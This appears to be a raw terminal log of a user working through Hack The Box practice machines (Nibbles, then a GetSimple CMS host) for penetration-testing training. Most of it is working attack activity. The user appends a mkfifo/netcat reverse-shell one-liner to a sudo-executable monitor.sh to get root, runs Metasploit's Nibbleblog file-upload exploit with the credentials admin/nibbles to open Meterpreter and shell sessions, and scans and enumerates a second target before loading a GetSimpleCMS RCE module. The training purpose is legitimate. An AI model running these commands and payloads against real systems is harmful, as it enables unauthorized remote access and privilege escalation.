──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ curl http://10.129.200.170/nibbleblog/content/private/plugins/my_image/image.php
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 9443
listening on [any] 9443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.65.155] 47846
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/
<ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal/stuff
lcd personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ s
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 9443
listening on [any] 9443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.65.155] 47848
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler/personal/stuff
<ate/plugins/my_image$ cd /home/nibbler/personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f' | tee -a monitor.sh
< /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f' | tee -a monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh
####################################################################################################
# Tecmint_monitor.sh #
# Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/ #
# If any bug, report us in the link below #
# Free to use/edit/distribute the code below by #
# giving proper credit to Tecmint.com and Author #
# #
####################################################################################################
#! /bin/bash
# unset any variable which system may be using
# clear the screen
clear
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
while getopts iv name
do
case $name in
i)iopt=1;;
v)vopt=1;;
*)echo "Invalid arg";;
esac
done
if [[ ! -z $iopt ]]
then
{
wd=$(pwd)
basename "$(test -L "$0" && readlink "$0" || echo "$0")" > /tmp/scriptname
scriptname=$(echo -e -n $wd/ && cat /tmp/scriptname)
su -c "cp $scriptname /usr/bin/monitor" root && echo "Congratulations! Script Installed, now run monitor Command" || echo "Installation failed"
}
fi
if [[ ! -z $vopt ]]
then
{
echo -e "tecmint_monitor version 0.1\nDesigned by Tecmint.com\nReleased Under Apache 2.0 License"
}
fi
if [[ $# -eq 0 ]]
then
{
# Define Variable tecreset
tecreset=$(tput sgr0)
# Check if connected to Internet or not
ping -c 1 google.com &> /dev/null && echo -e '\E[32m'"Internet: $tecreset Connected" || echo -e '\E[32m'"Internet: $tecreset Disconnected"
# Check OS Type
os=$(uname -o)
echo -e '\E[32m'"Operating System Type :" $tecreset $os
# Check OS Release Version and Name
cat /etc/os-release | grep 'NAME\|VERSION' | grep -v 'VERSION_ID' | grep -v 'PRETTY_NAME' > /tmp/osrelease
echo -n -e '\E[32m'"OS Name :" $tecreset && cat /tmp/osrelease | grep -v "VERSION" | cut -f2 -d\"
echo -n -e '\E[32m'"OS Version :" $tecreset && cat /tmp/osrelease | grep -v "NAME" | cut -f2 -d\"
# Check Architecture
architecture=$(uname -m)
echo -e '\E[32m'"Architecture :" $tecreset $architecture
# Check Kernel Release
kernelrelease=$(uname -r)
echo -e '\E[32m'"Kernel Release :" $tecreset $kernelrelease
# Check hostname
echo -e '\E[32m'"Hostname :" $tecreset $HOSTNAME
# Check Internal IP
internalip=$(hostname -I)
echo -e '\E[32m'"Internal IP :" $tecreset $internalip
# Check External IP
externalip=$(curl -s ipecho.net/plain;echo)
echo -e '\E[32m'"External IP : $tecreset "$externalip
# Check DNS
nameservers=$(cat /etc/resolv.conf | sed '1 d' | awk '{print $2}')
echo -e '\E[32m'"Name Servers :" $tecreset $nameservers
# Check Logged In Users
who>/tmp/who
echo -e '\E[32m'"Logged In users :" $tecreset && cat /tmp/who
# Check RAM and SWAP Usages
free -h | grep -v + > /tmp/ramcache
echo -e '\E[32m'"Ram Usages :" $tecreset
cat /tmp/ramcache | grep -v "Swap"
echo -e '\E[32m'"Swap Usages :" $tecreset
cat /tmp/ramcache | grep -v "Mem"
# Check Disk Usages
df -h| grep 'Filesystem\|/dev/sda*' > /tmp/diskusage
echo -e '\E[32m'"Disk Usages :" $tecreset
cat /tmp/diskusage
# Check Load Average
loadaverage=$(top -n 1 -b | grep "load average:" | awk '{print $10 $11 $12}')
echo -e '\E[32m'"Load Average :" $tecreset $loadaverage
# Check System Uptime
tecuptime=$(uptime | awk '{print $3,$4}' | cut -f1 -d,)
echo -e '\E[32m'"System Uptime Days/(HH:MM) :" $tecreset $tecuptime
# Unset Variables
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage
# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
shift $(($OPTIND -1))
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.4.56-dev ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit nibbleblog
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.65.155
RHOSTS => 10.129.65.155
msf6 exploit(multi/http/nibbleblog_file_upload) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/content/private/plugins/my_image/
TARGETURI => /nibbleblog/content/private/plugins/my_image/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:h
ost:port][...]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploi
t.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog/content/privat yes The base path to the web application
e/plugins/my_image/
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST tun0
LHOST => 10.10.15.44
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI nibbleblog
TARGETURI => nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > rn
[-] Unknown command: rn. Run the help command for more details.
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Sending stage (40004 bytes) to 10.129.65.155
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.15.44:4444 -> 10.129.65.155:38940) at 2025-06-23 16:45:34 -0400
id
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
For more info on a specific command, use <command> -h or help <command>.
meterpreter > exit
[*] Shutting down session: 1
[*] 10.129.65.155 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(multi/http/nibbleblog_file_upload) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.15.44 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(multi/http/nibbleblog_file_upload) > set payloadshowInterrupt: use the 'exit' command to quit
msf6 exploit(multi/http/nibbleblog_file_upload) > show generic
[-] Invalid parameter "generic", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > show payloads | grep generic
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
[-] Invalid parameter "|", use "show -h" for more information
[-] Invalid parameter "grep", use "show -h" for more information
[-] Invalid parameter "generic", use "show -h" for more information
msf6 exploit(multi/http/nibbleblog_file_upload) > set payload payload/generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS 10.129.65.155 yes The target host(s), see https://docs.metasploit.com/docs/
using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.15.44 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[+] Deleted image.php
[*] Command shell session 2 opened (10.10.15.44:4444 -> 10.129.65.155:38942) at 2025-06-23 16:48:05 -0400
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ ls
ls
db.xml
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ exit
<ml/nibbleblog/content/private/plugins/my_image$ exit
exit
^C
Abort session 2? [y/N] ^C
[*] 10.129.65.155 - Command shell session 2 closed. Reason: User exit
msf6 exploit(multi/http/nibbleblog_file_upload) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/nibbleblog_file_upload) > exit
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ cd
┌──(kali-user㉿kali-linux)-[~]
└─$ cd .ssh
┌──(kali-user㉿kali-linux)-[~/.ssh]
└─$ ls
known_hosts known_hosts.old
┌──(kali-user㉿kali-linux)-[~/.ssh]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~]
└─$ ls
Desktop Documents Downloads htb-practice Music Pictures Public Templates Videos
┌──(kali-user㉿kali-linux)-[~]
└─$ cd Desktop/h
cd: no such file or directory: Desktop/h
┌──(kali-user㉿kali-linux)-[~]
└─$ cd htb-practice
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ ls
Nibbles
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ mkdir knowledge
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ cd knowledge
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ mkdir nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ cd nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:25 EDT
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.49 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:35 EDT
Nmap scan report for 10.129.230.124
Host is up (0.019s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ whatweb http://10.129.230.124
http://10.129.230.124 [200 OK] AddThis, Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.230.124], Script[text/javascript], Title[Welcome to GetSimple! - gettingstarted]
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open 10.129.230.124 -oA nmap_scan -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:36 EDT
Nmap scan report for 10.129.230.124
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ ls
nmap_full_scan.gnmap nmap_full_scan.xml nmap_scan.nmap
nmap_full_scan.nmap nmap_scan.gnmap nmap_scan.xml
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ ls
nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.230.124 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.230.124
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/admin (Status: 301) [Size: 316] [--> http://10.129.230.124/admin/]
/backups (Status: 301) [Size: 318] [--> http://10.129.230.124/backups/]
/data (Status: 301) [Size: 315] [--> http://10.129.230.124/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 318] [--> http://10.129.230.124/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 279]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 316] [--> http://10.129.230.124/theme/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ msfconsole
Metasploit tip: View missing module options with show missing
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.4.56-dev ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit getcms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/getsimplecms_unauth_code_exec
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type
:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see http
s://docs.metasploit.com/docs
/using-metasploit/basics/usi
ng-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoi
ng connections
